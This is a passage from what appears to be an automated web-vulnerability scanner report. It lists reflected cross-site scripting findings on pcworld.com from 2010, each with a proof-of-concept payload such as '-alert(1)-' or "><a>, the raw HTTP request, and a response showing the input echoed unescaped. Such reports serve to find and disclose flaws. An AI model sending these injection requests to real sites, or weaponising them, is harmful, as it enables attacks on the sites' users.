The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2cd1f'-alert(1)-'937bb26ab8c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /blogs/2cd1f'-alert(1)-'937bb26ab8c/bizfeed.html HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 15 Nov 2010 22:58:26 GMT
Cache-Control: max-age=60
Set-Cookie: JSESSIONID=8030AB6C440DDD542DF4DC4B0A9211CD; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:58:25 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
ew Object();
   Logon.userEmail = pcw_readCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/blogs/2cd1f'-alert(1)-'937bb26ab8c/bizfeed.html';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "p
...[SNIP]...

1.28. http://www.pcworld.com/blogs/id,61/bizfeed.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/blogs/id,61/bizfeed.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7cc54'-alert(1)-'6e34da32754 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /blogs/id,61/bizfeed.html7cc54'-alert(1)-'6e34da32754 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=F2DD351341D8E52039B01234FB55A92D; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:58:27 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
on.userEmail = pcw_readCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/blogs/id,61/bizfeed.html7cc54'-alert(1)-'6e34da32754';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.29. http://www.pcworld.com/blogs/id,62/geek_tech.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/blogs/id,62/geek_tech.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8c125'-alert(1)-'39c55748519 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /blogs/8c125'-alert(1)-'39c55748519/geek_tech.html HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 15 Nov 2010 22:57:24 GMT
Cache-Control: max-age=60
Set-Cookie: JSESSIONID=7968B0FE6A7F566C9D2C640C74AA2358; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:57:24 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
ew Object();
   Logon.userEmail = pcw_readCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/blogs/8c125'-alert(1)-'39c55748519/geek_tech.html';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie =
...[SNIP]...

1.30. http://www.pcworld.com/blogs/id,62/geek_tech.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/blogs/id,62/geek_tech.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 192cb'-alert(1)-'416bb20e1a4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /blogs/id,62/geek_tech.html192cb'-alert(1)-'416bb20e1a4 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:57:26 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
.userEmail = pcw_readCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/blogs/id,62/geek_tech.html192cb'-alert(1)-'416bb20e1a4';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.31. http://www.pcworld.com/blogs/id,66/linux_line.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/blogs/id,66/linux_line.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 55265'-alert(1)-'a109872e66c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /blogs/55265'-alert(1)-'a109872e66c/linux_line.html HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 15 Nov 2010 22:58:07 GMT
Cache-Control: max-age=60
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:58:07 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
ew Object();
   Logon.userEmail = pcw_readCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/blogs/55265'-alert(1)-'a109872e66c/linux_line.html';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie =
...[SNIP]...

1.32. http://www.pcworld.com/blogs/id,66/linux_line.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/blogs/id,66/linux_line.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 292dc'-alert(1)-'b3698f2a39f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /blogs/id,66/linux_line.html292dc'-alert(1)-'b3698f2a39f HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=5D3AD06A566ABDB7C2D25706D4AF4DBC; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:58:09 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
userEmail = pcw_readCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/blogs/id,66/linux_line.html292dc'-alert(1)-'b3698f2a39f';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.33. http://www.pcworld.com/blogs/id,67/net_work.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/blogs/id,67/net_work.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b0710'-alert(1)-'9db33a76e8a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /blogs/b0710'-alert(1)-'9db33a76e8a/net_work.html HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 15 Nov 2010 22:57:53 GMT
Cache-Control: max-age=60
Set-Cookie: JSESSIONID=BA202F1EEDF7CDA0884F7F7F75E3CAB9; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:57:53 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
ew Object();
   Logon.userEmail = pcw_readCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/blogs/b0710'-alert(1)-'9db33a76e8a/net_work.html';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "
...[SNIP]...

1.34. http://www.pcworld.com/blogs/id,67/net_work.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/blogs/id,67/net_work.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 64209'-alert(1)-'6234fb55e46 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /blogs/id,67/net_work.html64209'-alert(1)-'6234fb55e46 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:57:54 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
n.userEmail = pcw_readCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/blogs/id,67/net_work.html64209'-alert(1)-'6234fb55e46';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.35. http://www.pcworld.com/blogs/id,71/daily_deals.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/blogs/id,71/daily_deals.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ca74d'-alert(1)-'bf8ab6cf1ae was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /blogs/ca74d'-alert(1)-'bf8ab6cf1ae/daily_deals.html HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 15 Nov 2010 22:57:13 GMT
Cache-Control: max-age=60
Set-Cookie: JSESSIONID=0E631C64C7861AE504E40679905DE9F5; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:57:13 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
ew Object();
   Logon.userEmail = pcw_readCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/blogs/ca74d'-alert(1)-'bf8ab6cf1ae/daily_deals.html';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie
...[SNIP]...

1.36. http://www.pcworld.com/blogs/id,71/daily_deals.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/blogs/id,71/daily_deals.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b862a'-alert(1)-'c96530a122c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /blogs/id,71/daily_deals.htmlb862a'-alert(1)-'c96530a122c HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:57:16 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
serEmail = pcw_readCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/blogs/id,71/daily_deals.htmlb862a'-alert(1)-'c96530a122c';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.37. http://www.pcworld.com/blogs/id,72/pcworld_podcast.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/blogs/id,72/pcworld_podcast.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dab9f'-alert(1)-'5b78173d8a9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /blogs/dab9f'-alert(1)-'5b78173d8a9/pcworld_podcast.html HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 15 Nov 2010 22:55:31 GMT
Cache-Control: max-age=60
Set-Cookie: JSESSIONID=1A4D5A5DCB1970567ED325C1BAFA0E9D; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:55:31 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
ew Object();
   Logon.userEmail = pcw_readCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/blogs/dab9f'-alert(1)-'5b78173d8a9/pcworld_podcast.html';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.coo
...[SNIP]...

1.38. http://www.pcworld.com/blogs/id,72/pcworld_podcast.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/blogs/id,72/pcworld_podcast.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8c9e5'-alert(1)-'660e752b332 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /blogs/id,72/pcworld_podcast.html8c9e5'-alert(1)-'660e752b332 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:55:32 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
mail = pcw_readCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/blogs/id,72/pcworld_podcast.html8c9e5'-alert(1)-'660e752b332';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.39. http://www.pcworld.com/browse.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/browse.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eb040'-alert(1)-'99cad240f98 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /browse.htmleb040'-alert(1)-'99cad240f98 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:58:57 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
ject();
   Logon.userEmail = pcw_readCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/browse.htmleb040'-alert(1)-'99cad240f98';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.40. http://www.pcworld.com/businesscenter/article/210556/facebook_email_is_the_missing_piece_of_the_puzzle.html [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.pcworld.com
Path:	/businesscenter/article/210556/facebook_email_is_the_missing_piece_of_the_puzzle.html

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 77490"><a>de8bb9d55a2 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /businesscenter/article/210556/facebook_email_is_the_missing_piece_of_the_puzzle.html77490"><a>de8bb9d55a2 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=BC0737F0D5559464E12C7F92A01EE089; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:46:18 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
...[SNIP]...
e;blg=network;pg=article;aid=210556;c=1730;c=1731;c=1733;c=1732;c=1735;pos=336showcase;tile=2;sz=336x280;
&url=/businesscenter/article/210556/facebook_email_is_the_missing_piece_of_the_puzzle.html77490"><a>de8bb9d55a2"/>
...[SNIP]...

1.41. http://www.pcworld.com/businesscenter/article/210556/facebook_email_is_the_missing_piece_of_the_puzzle.html [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/businesscenter/article/210556/facebook_email_is_the_missing_piece_of_the_puzzle.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a4bd8'-alert(1)-'a6b9bd474b4 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /businesscenter/article/210556/facebook_email_is_the_missing_piece_of_the_puzzle.htmla4bd8'-alert(1)-'a6b9bd474b4 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:46:27 GMT
Connection: close
Vary: Accept-Encoding

                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
...[SNIP]...
lid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/businesscenter/article/210556/facebook_email_is_the_missing_piece_of_the_puzzle.htmla4bd8'-alert(1)-'a6b9bd474b4';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri=" + e
...[SNIP]...

1.42. http://www.pcworld.com/businesscenter/index/cell_phones_voip/cell_phones.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.pcworld.com
Path:	/businesscenter/index/cell_phones_voip/cell_phones.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4c6c8"><a>125b6148f7c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /businesscenter/index/cell_phones_voip4c6c8"><a>125b6148f7c/cell_phones.html HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 15 Nov 2010 22:40:51 GMT
Cache-Control: max-age=60
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:40:51 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
...[SNIP]...
img style="display:none" width="1" height="1" src="http://pixel.pcworld.com/pixel.gif?ad=pcw.bc/index;pg=index;c=1730;pos=336showcase;tile=2;sz=336x280;
&url=/businesscenter/index/cell_phones_voip4c6c8"><a>125b6148f7c/cell_phones.html"/>
...[SNIP]...

1.43. http://www.pcworld.com/businesscenter/index/cell_phones_voip/cell_phones.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/businesscenter/index/cell_phones_voip/cell_phones.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 24593'-alert(1)-'3f83e2d88cd was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /businesscenter/index/cell_phones_voip24593'-alert(1)-'3f83e2d88cd/cell_phones.html HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 15 Nov 2010 22:41:50 GMT
Cache-Control: max-age=60
Set-Cookie: JSESSIONID=8E78B875A1ED908DA94325CC670D1D4E; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:41:49 GMT
Connection: close
Vary: Accept-Encoding

